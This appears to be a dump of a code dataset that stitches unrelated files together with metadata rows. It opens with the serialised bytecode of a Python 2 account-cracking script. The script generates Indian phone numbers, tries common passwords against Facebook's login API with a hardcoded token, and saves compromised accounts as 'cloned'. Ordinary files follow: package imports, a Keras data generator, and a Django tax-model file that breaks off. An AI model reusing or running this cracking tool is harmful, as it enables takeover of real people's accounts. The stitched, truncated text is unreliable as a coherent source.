1e\x00GHt\x00\x00d\x1f\x00\x83\x01\x00\x01t\x0c\x00\x83\x00\x00\x01d\x00\x00S( \x00\x00\x00Ns\x16\x00\x00\x00\n\x1b[1;92mCHOOSE:\x1b[1;97mR\x0b\x00\x00\x00s\x15\x00\x00\x00[!] Fill In CorrectlyR/\x00\x00\x00R&\x00\x00\x00s\x1b\x00\x00\x00Enter any INDIA code Numbers\x01\x00\x00\x00\ns\x92\x00\x00\x00first three digits and the last seven digits of any phone number in this country.Write the remaining digits here.750 to 799,800 to 899,900 to 999,s\x10\x00\x00\x00\x1b[1;92mCHOOSE : s\x03\x00\x00\x00+91s\x04\x00\x00\x00.txtt\x01\x00\x00\x00rs\x12\x00\x00\x00[!] File Not Founds\t\x00\x00\x00\n[ Back ]t\x01\x00\x00\x000i2\x00\x00\x00s\x08\x00\x00\x00\x1b[1;92m-s\x1a\x00\x00\x00\x1b[1;92m Total ids number: s\x18\x00\x00\x00\x1b[1;92mCode you choose: s%\x00\x00\x00\x1b[1;92mWait A While Start Cracking...s#\x00\x00\x00\x1b[1;92mTo Stop Process Press Ctrl+zs\x08\x00\x00\x00\x1b[1;91m-c\x01\x00\x00\x00\x08\x00\x00\x00\x05\x00\x00\x00\x13\x00\x00\x00s\x89\x02\x00\x00|\x00\x00}\x01\x00y\x11\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01Wn\x11\x00\x04t\x02\x00k\n\x00r*\x00\x01\x01\x01n\x01\x00XyP\x02|\x01\x00}\x02\x00t\x03\x00j\x04\x00d\x02\x00\x88\x01\x00\x17\x88\x00\x00\x17|\x01\x00\x17d\x03\x00\x17|\x02\x00\x17d\x04\x00\x17\x83\x01\x00}\x03\x00t\x05\x00j\x06\x00|\x03\x00\x83\x01\x00}\x04\x00d\x05\x00|\x04\x00k\x06\x00r\xdd\x00d\x06\x00\x88\x01\x00\x17\x88\x00\x00\x17|\x01\x00\x17d\x07\x00\x17|\x02\x00\x17GHt\x04\x00d\x08\x00d\t\x00\x83\x02\x00}\x05\x00|\x05\x00j\x07\x00\x88\x01\x00\x88\x00\x00\x17|\x01\x00\x17|\x02\x00\x17d\n\x00\x17\x83\x01\x00\x01|\x05\x00j\x08\x00\x83\x00\x00\x01t\t\x00j\n\x00\x88\x00\x00|\x01\x00\x17|\x02\x00\x17\x83\x01\x00\x01n\x9d\x01d\x0b\x00|\x04\x00d\x0c\x00\x19k\x06\x00rT\x01d\r\x00\x88\x01\x00\x17\x88\x00\x00\x17|\x01\x00\x17d\x07\x00\x17|\x02\x00\x17GHt\x04\x00d\x08\x00d\t\x00\x83\x02\x00}\x06\x00|\x06\x00j\x07\x00\x88\x01\x00\x88\x00\x00\x17|\x01\x00\x17|\x02\x00\x17d\n\x00\x17\x83\x01\x00\x01|\x06\x00j\x08\x00\x83\x00\x00\x01t\x0b\x00j\n\x00\x88\x00\x00|\x01\x00\x17|\x02\x00\x17\x83\x01\x00\x01n&\x01d\x0e\x00}\x07\x00t\x03\x00j\x04\x00d\x02\x00\x88\x01\x00\x17\x88\x00\x00\x17|\x01\x00\x17d\x03\x00\x17|\x07\x00\x17d\x04\x00\x17\x83\x01\x00}\x03\x00t\x05\x00j\x06\x00|\x03\x00\x83\x01\x00}\x04\x00d\x05\x00|\x04\x00k\x06\x00r\x03\x02d\x06\x00\x88\x01\x00\x17\x88\x00\x00\x17|\x01\x00\x17d\x07\x00\x17|\x07\x00\x17GHt\x04\x00d\x08\x00d\t\x00\x83\x02\x00}\x05\x00|\x05\x00j\x07\x00\x88\x01\x00\x88\x00\x00\x17|\x01\x00\x17|\x07\x00\x17d\n\x00\x17\x83\x01\x00\x01|\x05\x00j\x08\x00\x83\x00\x00\x01t\t\x00j\n\x00\x88\x00\x00|\x01\x00\x17|\x07\x00\x17\x83\x01\x00\x01nw\x00d\x0b\x00|\x04\x00d\x0c\x00\x19k\x06\x00rz\x02d\r\x00\x88\x01\x00\x17\x88\x00\x00\x17|\x01\x00\x17d\x07\x00\x17|\x07\x00\x17GHt\x04\x00d\x08\x00d\t\x00\x83\x02\x00}\x06\x00|\x06\x00j\x07\x00\x88\x01\x00\x88\x00\x00\x17|\x01\x00\x17|\x07\x00\x17d\n\x00\x17\x83\x01\x00\x01|\x06\x00j\x08\x00\x83\x00\x00\x01t\x0b\x00j\n\x00\x88\x00\x00|\x01\x00\x17|\x07\x00\x17\x83\x01\x00\x01n\x00\x00Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(\x0f\x00\x00\x00Nt\x04\x00\x00\x00saves\x91\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=s\x17\x00\x00\x00&locale=en_US&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efmt\x0c\x00\x00\x00access_tokens\x15\x00\x00\x00\x1b[1;92m[Hack\xe2\x9d\xa4\xef\xb8\x8f] s\x05\x00\x00\x00 | s\x0f\x00\x00\x00save/cloned.txtR\x00\x00\x00\x00s\x01\x00\x00\x00\ns\x10\x00\x00\x00www.facebook.comt\t\x00\x00\x00error_msgs\x0f\x00\x00\x00\x1b[1;93m[CHECK] t\x06\x00\x00\x00223344(\x0c\x00\x00\x00R\x06\x00\x00\x00t\x05\x00\x00\x00mkdirt\x07\x00\x00\x00OSErrort\x02\x00\x00\x00brt\x04\x00\x00\x00opent\x04\x00\x00\x00jsont\x04\x00\x00\x00loadR\x1b\x00\x00\x00t\x05\x00\x00\x00closet\x03\x00\x00\x00okst\x06\x00\x00\x00appendt\x03\x00\x00\x00cpb(\x08\x00\x00\x00t\x03\x00\x00\x00argt\x04\x00\x00\x00usert\x05\x00\x00\x00pass1t\x04\x00\x00\x00datat\x01\x00\x00\x00qt\x03\x00\x00\x00okbt\x03\x00\x00\x00cpst\x05\x00\x00\x00pass2(\x02\x00\x00\x00t\x01\x00\x00\x00ct\x01\x00\x00\x00k(\x00\x00\x00\x00s\x0c\x00\x00\x00tahmid_rayatt\x04\x00\x00\x00main\xa6\x00\x00\x00sL\x00\x00\x00\x00\x01\x06\x01\x03\x01\x11\x01\r\x01\x04\x02\x03\x01\x06\x01\'\x01\x0f\x01\x0c\x01\x19\x01\x0f\x01\x1d\x01\n\x01\x18\x01\x10\x01\x19\x01\x0f\x01\x1d\x01\n\x01\x18\x02\x06\x01\'\x01\x0f\x01\x0c\x01\x19\x01\x0f\x01\x1d\x01\n\x01\x18\x01\x10\x01\x19\x01\x0f\x01\x1d\x01\n\x01\x1c\x01\x03\x01i\x1e\x00\x00\x00s\x1e\x00\x00\x00Process Has Been Completed ...s\x19\x00\x00\x00Total Hack\xe2\x9c\x93/CHECK\xe2\x9d\x97 : t\x01\x00\x00\x00/s0\x00\x00\x00Cloned Accounts Has Been Saved : save/cloned.txts:\x00\x00\x00Note : Your CHECK\xe2\x9d\x97 account Will Open after 10 to 20 dayss\x88\x03\x00\x00\n ______________________\n \xe2\x95\x91\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x95\x91\n \xe2\x95\x91\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x95\x91\n \xe2\x95\x91\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x95\x91\n \xe2\x95\x91\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x95\x91\n \xe2\x95\x91\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x95\x91\n \xe2\x95\x91\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x95\x91 \xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x97 \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\n \xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x9a\xe2\x95\x97\n \xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x97\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x97\xe2\x96\x88\xe2\x95\x91\n \xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x95\xac\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x95\x9a\xe2\x95\x97\xe2\x95\x91\xe2\x96\x88\xe2\x95\x91\n \xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x95\x9a\xe2\x95\x9d\xe2\x96\x88\xe2\x95\x91\n \xe2\x95\x9a\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x90\xe2\x95\x9d\n \xe2\x95\x9a\xe2\x95\x97\xe2\x95\x91\xe2\x95\xa0\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\x9d\n \xe2\x95\x91\xe2\x95\x91\xe2\x94\x88\xe2\x94\x88\xe2\x94\x88\xe2\x96\x88\xe2\x96\x90\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x92.\xef\xbd\xa1oO\n \xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\xa0\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\x97\n \xe2\x95\x9a\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\n \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\n\n\x1b[1;96mThanks See You Later\n\x1b[1;96m My Contact\n\x1b[1;95mFb\x1b[1;92mJogiMaharaja\n\x1b[1;95myoutube\x1b[1;97mhttps://www.youtube.com/channel/UCHetqAquUkojxVvPebQpb0gs\x1c\x00\x00\x00\n\x1b[1;92m[\x1b[1;92mBack\x1b[1;95m](\x14\x00\x00\x00R0\x00\x00\x00R3\x00\x00\x00R\x06\x00\x00\x00R*\x00\x00\x00t\x05\x00\x00\x00logo2R=\x00\x00\x00t\t\x00\x00\x00readlinest\x02\x00\x00\x00idRB\x00\x00\x00t\x05\x00\x00\x00stript\x07\x00\x00\x00IOErrort\x0b\x00\x00\x00blackmafiaxR+\x00\x00\x00R\x19\x00\x00\x00R\x10\x00\x00\x00R"\x00\x00\x00R\x01\x00\x00\x00t\x03\x00\x00\x00mapRA\x00\x00\x00RC\x00\x00\x00(\x06\x00\x00\x00R2\x00\x00\x00t\x06\x00\x00\x00idlistt\x04\x00\x00\x00linet\x03\x00\x00\x00xxxRN\x00\x00\x00t\x01\x00\x00\x00p(\x00\x00\x00\x00(\x02\x00\x00\x00RL\x00\x00\x00RM\x00\x00\x00s\x0c\x00\x00\x00tahmid_rayatR3\x00\x00\x00\x81\x00\x00\x00sT\x00\x00\x00\x00\x03\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\r\x01\x05\x01\t\x01\x05\x01\x03\x01\x0c\x01\x06\x01\x06\x01\x1c\x01\x1b\x02\r\x01\x05\x01\n\x01\x0e\x02\x0c\x01\n\x02\x05\x01\x07\x01\t\x01\x12\x01\x0e\x01\x0e\x01\n\x01\n\x01\t\x02\x12*\x0c\x01\x10\x01\t\x01\x05\x01)\x01\x05\x01\n\x01\x05\x01\x05\x01\n\x01t\x08\x00\x00\x00__main__(\x02\x00\x00\x00s\n\x00\x00\x00User-AgentsR\x00\x00\x00Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16(\x02\x00\x00\x00s\n\x00\x00\x00user-agents\x1e\x01\x00\x00Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;](=\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x1e\x00\x00\x00t\x08\x00\x00\x00datetimeR\x0e\x00\x00\x00t\x07\x00\x00\x00hashlibt\x02\x00\x00\x00ret\t\x00\x00\x00threadingR>\x00\x00\x00t\x06\x00\x00\x00urllibt\t\x00\x00\x00cookielibt\x07\x00\x00\x00getpassR*\x00\x00\x00t\x05\x00\x00\x00ranget\x01\x00\x00\x00nR\x0f\x00\x00\x00t\x04\x00\x00\x00nmbrR=\x00\x00\x00R\x1a\x00\x00\x00R\x1d\x00\x00\x00t\x08\x00\x00\x00requestst\x0b\x00\x00\x00ImportErrort\t\x00\x00\x00mechanizeR\x1f\x00\x00\x00t\x14\x00\x00\x00multiprocessing.poolR\x01\x00\x00\x00t\x13\x00\x00\x00requests.exceptionsR\x02\x00\x00\x00R\x03\x00\x00\x00t\x06\x00\x00\x00reloadt\x12\x00\x00\x00setdefaultencodingR<\x00\x00\x00t\x11\x00\x00\x00set_handle_robotst\x05\x00\x00\x00Falset\x12\x00\x00\x00set_handle_refresht\x05\x00\x00\x00_httpt\x14\x00\x00\x00HTTPRefreshProcessort\n\x00\x00\x00addheadersR\t\x00\x00\x00R\x16\x00\x00\x00R\x11\x00\x00\x00R"\x00\x00\x00R%\x00\x00\x00t\x04\x00\x00\x00backRA\x00\x00\x00RR\x00\x00\x00RC\x00\x00\x00t\x06\x00\x00\x00vulnott\x04\x00\x00\x00vulnR-\x00\x00\x00RP\x00\x00\x00t\x0f\x00\x00\x00CorrectPasscodet\x04\x00\x00\x00loopR0\x00\x00\x00t\x08\x00\x00\x00passcodeR,\x00\x00\x00R+\x00\x00\x00R.\x00\x00\x00R1\x00\x00\x00R3\x00\x00\x00t\x08\x00\x00\x00__name__(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x0c\x00\x00\x00tahmid_rayatt\x08\x00\x00\x00<module>\x02\x00\x00\x00st\x00\x00\x00\x90\x01\r\x01\x13\x01\x12\x01\x12\x01\x05\x01\x11\x02\x03\x01\x10\x01\r\x01\x11\x02\x03\x01\x10\x01\r\x01\r\x01\r\x01\x11\x02\x9c\x01\x10\x01\x10\x01\x10\x01\n\x01\r\x01\x0c\x01\r\x01\x1c\x01\x0c\x01\x0c\x02\t\x05\t\t\t\x0b\t\x07\t\t\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\r\x01\x05\x01\x06\x01\x06\x01\x06\x01\x06\x01\x0f\x01\x0c\x01\x0c\x01\x05\x01\t\x02\x05\x01\x11\x02\t\x05\t\t\t\t\t\n\t\\\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x0c\x00\x00\x00tahmid_rayatt\x08\x00\x00\x00<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x0c\x01'))
| 8,186
| 24,542
| 0.749002
| 5,381
| 24,558
| 3.406244
| 0.106857
| 0.235037
| 0.115882
| 0.080528
| 0.655737
| 0.589612
| 0.507284
| 0.459545
| 0.423318
| 0.394621
| 0
| 0.378423
| 0.01413
| 24,558
| 3
| 24,542
| 8,186
| 0.37863
| 0
| 0
| 0
| 0
| 2.5
| 0.533757
| 0.467872
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 11
|
8291ddc028f1d54d7bc24e7c70835f4edb38515f
| 186
|
py
|
Python
|
whatlies/transformers/__init__.py
|
louisguitton/whatlies
|
a6cfa8a08555fbd8a9cee950e36a2cd59a2eb7c0
|
[
"Apache-2.0"
] | null | null | null |
whatlies/transformers/__init__.py
|
louisguitton/whatlies
|
a6cfa8a08555fbd8a9cee950e36a2cd59a2eb7c0
|
[
"Apache-2.0"
] | null | null | null |
whatlies/transformers/__init__.py
|
louisguitton/whatlies
|
a6cfa8a08555fbd8a9cee950e36a2cd59a2eb7c0
|
[
"Apache-2.0"
] | null | null | null |
from whatlies.transformers.pca import Pca
from whatlies.transformers.umap import Umap
from whatlies.transformers.noise import Noise
from whatlies.transformers.addrandom import AddRandom
| 37.2
| 53
| 0.870968
| 24
| 186
| 6.75
| 0.333333
| 0.296296
| 0.592593
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086022
| 186
| 4
| 54
| 46.5
| 0.952941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
82a9d80d4be624c40bb0b4e5ee8fb60babdbd5e9
| 216
|
py
|
Python
|
autosense/neural/__init__.py
|
jay1999ke/autoSense
|
b3027c5a7c1f2fb5a67decdf3e3f8a751313ace8
|
[
"MIT"
] | null | null | null |
autosense/neural/__init__.py
|
jay1999ke/autoSense
|
b3027c5a7c1f2fb5a67decdf3e3f8a751313ace8
|
[
"MIT"
] | null | null | null |
autosense/neural/__init__.py
|
jay1999ke/autoSense
|
b3027c5a7c1f2fb5a67decdf3e3f8a751313ace8
|
[
"MIT"
] | null | null | null |
import autosense.neural.loss as Loss
from autosense.neural.param import Weight, Initializer
from autosense.neural.layers import Linear, Conv2D, Dropout, Linear2
from autosense.neural.optim import Optimizer, optimNode
| 54
| 68
| 0.847222
| 29
| 216
| 6.310345
| 0.586207
| 0.327869
| 0.311475
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010204
| 0.092593
| 216
| 4
| 69
| 54
| 0.923469
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
82c4ded45ee65328011c8fc99a977e3023ed0234
| 3,307
|
py
|
Python
|
source/utils/data_generator.py
|
gujingxiao/IJCAI_Keras_Defense
|
e69b41c651e364e27c837f7c57efc6214b907373
|
[
"Apache-2.0"
] | 1
|
2019-10-11T15:31:25.000Z
|
2019-10-11T15:31:25.000Z
|
source/utils/data_generator.py
|
gujingxiao/IJCAI_Keras_Defense
|
e69b41c651e364e27c837f7c57efc6214b907373
|
[
"Apache-2.0"
] | null | null | null |
source/utils/data_generator.py
|
gujingxiao/IJCAI_Keras_Defense
|
e69b41c651e364e27c837f7c57efc6214b907373
|
[
"Apache-2.0"
] | null | null | null |
import os
import keras
import pandas as pd
import numpy as np
import cv2
from utils.preprocessing import data_augment
from utils.iaa_process import iaa_data_augment
# Train Generator
def train_generator(train_list, size, batchsize, augment, num_classes):
# Arrange all indexes
all_batches_index = np.arange(0, len(train_list))
out_images = []
out_masks = []
image_dir = np.array(train_list['image_dir'])
label_dir = np.array(train_list['label'])
while True:
# Random shuffle indexes every epoch
np.random.shuffle(all_batches_index)
for index in all_batches_index:
if os.path.exists(os.path.join('../', image_dir[index])):
image = cv2.resize(cv2.imread(os.path.join('../', image_dir[index])), (size, size))
if augment != False:
image_aug = iaa_data_augment(image)
label = int(label_dir[index])
image_aug = np.array(image_aug)
image_aug = image_aug / 255.
out_images.append(image_aug)
else:
image = np.array(image)
image = image / 255.
label = int(label_dir[index])
out_images.append(image)
out_masks.append(label)
if len(out_images) >= batchsize:
out_images = np.array(out_images)
out_masks = np.array(out_masks)
out_masks = keras.utils.to_categorical(out_masks, num_classes=num_classes)
yield out_images, out_masks
out_images, out_masks = [], []
else:
print(image_dir[index], 'does not exist.')
def valid_generator(val_list, size, batchsize, augment, num_classes):
# Arrange all indexes
all_batches_index = np.arange(0, len(val_list))
out_images = []
out_masks = []
image_dir = np.array(val_list['image_dir'])
label_dir = np.array(val_list['label'])
while True:
# Random shuffle indexes every epoch
np.random.shuffle(all_batches_index)
for index in all_batches_index:
if os.path.exists(os.path.join('../', image_dir[index])):
image = cv2.resize(cv2.imread(os.path.join('../', image_dir[index])), (size, size))
if augment != False:
image_aug = iaa_data_augment(image)
label = int(label_dir[index])
image_aug = np.array(image_aug)
image_aug = image_aug / 255.
out_images.append(image_aug)
else:
image = np.array(image)
image = image / 255.
label = int(label_dir[index])
out_images.append(image)
out_masks.append(label)
if len(out_images) >= batchsize:
out_images = np.array(out_images)
out_masks = np.array(out_masks)
out_masks = keras.utils.to_categorical(out_masks, num_classes=num_classes)
yield out_images, out_masks
out_images, out_masks = [], []
else:
print(image_dir[index], 'does not exist.')
| 41.860759
| 99
| 0.554279
| 390
| 3,307
| 4.448718
| 0.174359
| 0.082997
| 0.055331
| 0.078386
| 0.88415
| 0.874928
| 0.874928
| 0.843804
| 0.843804
| 0.802305
| 0
| 0.008804
| 0.347445
| 3,307
| 79
| 100
| 41.860759
| 0.795181
| 0.037799
| 0
| 0.782609
| 0
| 0
| 0.022033
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028986
| false
| 0
| 0.101449
| 0
| 0.130435
| 0.028986
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7d9a7c27387a68848932fd71df2d5cc504678da5
| 53,830
|
py
|
Python
|
webapp/apps/taxbrain/models.py
|
OpenSourcePolicyCenter/PolicyBrain
|
5edffcd5cf8bb6544afc1ed982636abe66e246e1
|
[
"MIT"
] | 13
|
2017-11-07T15:54:42.000Z
|
2018-09-27T20:56:28.000Z
|
webapp/apps/taxbrain/models.py
|
OpenSourcePolicyCenter/webapp-public
|
5edffcd5cf8bb6544afc1ed982636abe66e246e1
|
[
"MIT"
] | 547
|
2015-08-07T21:32:51.000Z
|
2017-09-14T21:25:43.000Z
|
webapp/apps/taxbrain/models.py
|
OpenSourcePolicyCenter/webapp-public
|
5edffcd5cf8bb6544afc1ed982636abe66e246e1
|
[
"MIT"
] | 23
|
2015-08-07T20:55:39.000Z
|
2017-08-25T19:20:20.000Z
|
import re
import uuid
import json
from distutils.version import LooseVersion
from django.db import models
from django.core import validators
from django.core.urlresolvers import reverse
from django.core.exceptions import ValidationError
from django.core.validators import MinValueValidator, MaxValueValidator, RegexValidator
from django.contrib.auth.models import User
from django.contrib.postgres.fields import JSONField, ArrayField
import datetime
from django.utils.timezone import make_aware
import taxcalc
from . import helpers
from . import param_formatters
from .behaviors import Resultable, Fieldable, DataSourceable, Hostnameable
# digit or true/false (case insensitive)
COMMASEP_REGEX = "(<,)|(\\d*\\.\\d+|\\d+)|((?i)(true|false))"
class CommaSeparatedField(models.CharField):
default_validators = [validators.RegexValidator(regex=COMMASEP_REGEX)]
description = "A comma separated field that allows multiple floats."
def __init__(self, verbose_name=None, name=None, **kwargs):
kwargs['max_length'] = kwargs.get('max_length', 200)
super(CommaSeparatedField, self).__init__(verbose_name, name, **kwargs)
def deconstruct(self):
name, path, args, kwargs = super(CommaSeparatedField, self).deconstruct()
if kwargs.get("max_length", None) == 1000:
del kwargs['max_length']
return name, path, args, kwargs
class SeparatedValuesField(models.TextField):
def __init__(self, *args, **kwargs):
self.token = kwargs.pop('token', ',')
super(SeparatedValuesField, self).__init__(*args, **kwargs)
def to_python(self, value):
if not value: return
if isinstance(value, list):
return value
return value.split(self.token)
def get_db_prep_value(self, value, connection=None, prepared=False):
if not value: return
assert(isinstance(value, list) or isinstance(value, tuple))
return self.token.join([str(s) for s in value])
def value_to_string(self, obj):
value = self._get_val_from_obj(obj)
return self.get_db_prep_value(value)
def from_db_value(self, value, expression, connection, context):
return self.to_python(value)
class JSONReformTaxCalculator(models.Model):
'''
This class holds all of the text for a JSON-based reform input
for TaxBrain. A TaxSavesInput Model will have a foreign key to
an instance of this model if the user created the TaxBrain job
through the JSON iput page.
'''
reform_text = models.TextField(blank=True, null=False)
raw_reform_text = models.TextField(blank=True, null=False)
assumption_text = models.TextField(blank=True, null=False)
raw_assumption_text = models.TextField(blank=True, null=False)
errors_warnings_text = models.TextField(blank=True, null=False)
def get_errors_warnings(self):
"""
Errors were only stored for the taxcalc.Policy class until PB 1.6.0
This method ensures that old runs are parsed correctly
"""
ew = json.loads(self.errors_warnings_text)
if 'errors' in ew:
return {'policy': ew}
else:
return ew
class ErrorMessageTaxCalculator(models.Model):
'''
This class holds all of the text for an error message on
TaxBrain. A TaxSavesInput Model will have a foreign key to
an instance of this model if the user created the TaxBrain job
that ends up failing and reporting this failure.
'''
text = models.CharField(blank=True, null=False, max_length=4000)
class TaxSaveInputs(DataSourceable, Fieldable, Resultable, Hostnameable,
models.Model):
"""
This model contains all the parameters for the tax model and the tax
result.
For filing status fields:
_0 = Single, _1 = Married filing Jointly, _2 = Married filing Separately,
_3 = Head of Household (example: _SS_thd50_0 is the Single filing
status for Income Threshold 1 in the Social Security Tax section.)
The exception to this rule is for EITC, where:
_0 = 0 Kids, _1 = 1 Kid, _2 = 2 Kids, & _3 = 3+ Kids
"""
# Parameters used for Social Security.
FICA_ss_trt = CommaSeparatedField(default=None, null=True, blank=True)
FICA_mc_trt = CommaSeparatedField(default=None, null=True, blank=True)
SS_Income_c = CommaSeparatedField(default=None, null=True, blank=True)
SS_Income_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
SS_thd50_0 = CommaSeparatedField(default=None, null=True, blank=True)
SS_thd50_1 = CommaSeparatedField(default=None, null=True, blank=True)
SS_thd50_2 = CommaSeparatedField(default=None, null=True, blank=True)
SS_thd50_3 = CommaSeparatedField(default=None, null=True, blank=True)
SS_thd50_4 = CommaSeparatedField(default=None, null=True, blank=True)
SS_thd50_cpi = models.NullBooleanField(default=None, blank=True, null=True)
SS_percentage1 = CommaSeparatedField(default=None, null=True, blank=True)
SS_thd85_0 = CommaSeparatedField(default=None, null=True, blank=True)
SS_thd85_1 = CommaSeparatedField(default=None, null=True, blank=True)
SS_thd85_2 = CommaSeparatedField(default=None, null=True, blank=True)
SS_thd85_3 = CommaSeparatedField(default=None, null=True, blank=True)
SS_thd85_4 = CommaSeparatedField(default=None, null=True, blank=True)
SS_thd85_cpi = models.NullBooleanField(default=None, blank=True, null=True)
SS_percentage2 = CommaSeparatedField(default=None, null=True, blank=True)
SS_Earnings_c = CommaSeparatedField(default=None, null=True, blank=True)
SS_Earnings_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
# Parameter for Additional Medicare tax
AMEDT_rt = CommaSeparatedField(default=None, blank=True, null=True)
AMEDT_ec_0 = CommaSeparatedField(default=None, blank=True, null=True)
AMEDT_ec_1 = CommaSeparatedField(default=None, blank=True, null=True)
AMEDT_ec_2 = CommaSeparatedField(default=None, blank=True, null=True)
AMEDT_ec_3 = CommaSeparatedField(default=None, blank=True, null=True)
AMEDT_ec_4 = CommaSeparatedField(default=None, blank=True, null=True)
AMEDT_ec_cpi = models.NullBooleanField(default=None, blank=True, null=True)
# Parameters used for Adjustments.
